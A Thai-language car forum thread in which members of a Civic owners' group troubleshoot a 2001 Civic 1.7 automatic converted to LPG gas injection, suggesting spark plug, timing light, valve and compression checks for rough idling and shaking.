ในส่วนของกล่องโมดังกล่าว มีเยอะครับที่ติดตั้งเข้าไป และจูนที่อ๊อกเทน 105 แก๊สไปเลย
น้ำมันไว้สตาร์ทเฉยๆ เพราะค่าโมถูกกว่าโมน้ำมันมาก เช่น หัวฉีดแก๊สราคาถูกว่าหัวฉีดน้ำมันซีซีสูงๆ
หม้อต้มแรงๆราคาถูกกว่าระบบสั่งจ่ายซีซีสูงๆของน้ำมัน และที่สำคัญเชื้อเพลิง LPG
ราคาถูกและหาเติมง่ายกว่า น้ำมันอ๊อกเทน 130 เป็นไหนๆครับ
ได้รับคำขอบคุณจาก: benzd  cisco  SYS 
suwitjim


ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ที่อยู่: กทม. ลาดกระบัง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 20 มกรา 2011 14:44 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
โทรหาร้านเขาบอกว่าอาจะเป็นที่สายจุดระเบิดอ่ะครับ ...

พี่มีวิธีตรวจสอบบ้างหรือป่าวครับพี่ ...
ได้รับคำขอบคุณจาก: benzd 
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
พฤหัส, 20 มกรา 2011 15:13 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
suwitjim พิมพ์ว่า:
โทรหาร้านเขาบอกว่าอาจะเป็นที่สายจุดระเบิดอ่ะครับ ...

พี่มีวิธีตรวจสอบบ้างหรือป่าวครับพี่ ...


ที่เราพูดถึงนี่ของคุณคือเครื่อง 1.6 ใช่หรือเปล่าครับ

ถ้าเป็นที่สายหัวเทียน จะมีอาการสะดุด อาการเช่น
เดินเบาเปิดแอร์เหยียบเบรกใส่เกียร์D รถจะสะดุด เป็นจังหวะๆ
เดินไม่เรียบ รอบเครื่องตกตามจังหวะที่สะดุดครับ

ถ้ามีอาการนี้
- ตรวจสอบหัวเทียน
- สายหัวเทียน
- จานจ่าย
- องศาจุดระเบิดครับ

วิธีตรวจสอบต้องใช้ไทมิ่งไลท์ในการจับสัญญาณการจุดระเบิด
แต่ละสูบดูครับ ว่าสะดุดสูบไหน ก็ลองสลับของดู เช่น สลับสายหัวเทียน
สลับหัวเทียน กับสูบที่ไม่เป็น อาการตามอุปกรณ์ไหนที่สลับไป
ตัวนั้นจ่ะครับสาเหตุ แต่ถ้าอาการไม่ตามอุปกรณ์ที่สามารถสลับได้หมดแล้ว

อาจเป็นที่กระบอกสูบนั้นๆมีปัญหา เช่น วาล์วรั่ว ลองตั้งวาล์วดู ถ้าไม่หาย
แบบนี้ต้องใช้เครื่องมือวัดกำลังอัดดู ถ้ากำลังอัดผิดปกติต้องเปิดฝาสูบดูแล้วล่ะครับ
พอเปิดดูก็จะรู้เองว่าเป็นที่อะไร

ไม่ทราบว่าตอนติดตั้งแก๊สถอดท่อไอดีมาเจาะข้างนอกไหมครับ
ถ้าไม่ได้ถอดทำใจไว้นิดนึงครับ

อ้ออย่าลืมดูองศาไฟจุดระเบิดจากไทม์มิ่งไลท์ด้วยว่าไฟแก่ไปหรือเปล่านะครับ
ได้รับคำขอบคุณจาก: benzd 
suwitjim


ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ที่อยู่: กทม. ลาดกระบัง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 20 มกรา 2011 15:21 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
เป็น civic01 1.7 AT ครับ ...

เยียบเบรกใส่เกียร์เครื่องเดินเรียบ ...

แต่ถ้าเข้า N / P แล้วเยียบแบบเบิ้ลเครื่องอ่ะจะสั่นแรก ๆ ...

ขอบคุณพี่มากเลยนะครับถ้ามากขนาดนี้เพราะรถคันแรก(มือสอง) ...
ได้รับคำขอบคุณจาก: benzd 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 20 มกรา 2011 15:22 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
ขอให้เจอสาเหตุไวๆละกันครับ
ได้รับคำขอบคุณจาก: suwitjim 
suwitjim


ชื่อเล่น: วิทย์

เข้าร่วม: 16 ตุลา 2010
ตอบ: 1959

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 893
ให้คำขอบคุณ: 1488

ที่อยู่: กทม. ลาดกระบัง
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 20 มกรา 2011 15:23 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
benzd พิมพ์ว่า:
ขอให้เจอสาเหตุไวๆละกันครับ


ขอบคุณครับ ...
ได้รับคำขอบคุณจาก: benzd 
URC


ชื่อเล่น: เบียร์

เข้าร่วม: 16 มกรา 2011
ตอบ: 28

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 1

ที่อยู่: 125/1 บางสีทอง บางกรวย นนทบุรี
พฤหัส, 20 มกรา 2011 15:57 - ***มีข้อสงสัยเกี่ยวกับเครื่องยนต์และแก๊สระบบหัวฉีด ถามได้ที่นี่ครับ
suwitjim พิมพ์ว่า:
เป็น civic01 1.7 AT ครับ ...

เยียบเบรกใส่เกียร์เครื่องเดินเรียบ ...

แต่ถ้าเข้า N / P แล้วเยียบแบบเบิ้ลเครื่องอ่ะจะสั่นแรก ๆ ...

ขอบคุณพี่มากเลยนะครับถ้ามากขนาดนี้เพราะรถคันแรก(มือสอง) ...


ถ้าเป็นเครื่อง 1.7 จะไม่มีสายหัวเทียน และ จานจ่าย
เพราะเป็น Direct coil แล้วครับ

สรุปคืออาการของคุณคือ อะไรกันแน่ครับ ตอนแรกบอก Blackfire
คุยไปคุยมาบอกไอเสียยิงออกท่อไอเสีย ตอนนี้บอกจอดรถใส่เกียร์ว่างเร่งเครื่องแล้วสั่น

หรือว่าเป็นทั้งหมดเลย ผมวิเคาะห์ปัญหาไม่ถูกแล้วนะครับเนี่ย

ยังไงลองไปตั้งวาล์วดูก่อนละกัน แล้วตกลงใช้น้ำมันเป็นไหมครับ ไม่เห็นตอบเลยครับ
ได้รับคำขอบคุณจาก: suwitjim  benzd 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.